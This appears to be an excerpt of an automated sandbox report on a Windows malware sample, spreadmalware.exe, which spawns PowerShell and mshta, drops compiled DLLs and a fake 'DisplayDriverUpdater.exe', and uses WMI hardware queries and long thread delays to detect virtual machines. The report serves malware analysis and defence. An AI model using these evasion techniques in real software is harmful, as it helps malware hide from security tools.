Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\roaming\displaydriverupdater.exe

Key value queried: Powershell behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE NetEnabled = True

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, FileSystem, FreeSpace, Size, VolumeName FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\spreadmalware.exe	Memory allocated: DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Memory allocated: 1A940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Memory allocated: 26FB4110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Memory allocated: 26FB5940000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 46_2_00007FFAA9EC1009 sldt word ptr [eax]

46_2_00007FFAA9EC1009

Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599498	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599369	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599137	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591084
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\spreadmalware.exe	Window / User API: threadDelayed 913	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Window / User API: threadDelayed 1011	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4824	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5026	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3152
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3959
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3235
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1962
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 451
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6609
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7445
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 698
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Window / User API: threadDelayed 7043

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.dll			Jump to dropped file

Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7840	Thread sleep count: 913 > 30	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7840	Thread sleep count: 1011 > 30	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599631s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599498s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599369s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599250s >= -30000s	Jump to behavior
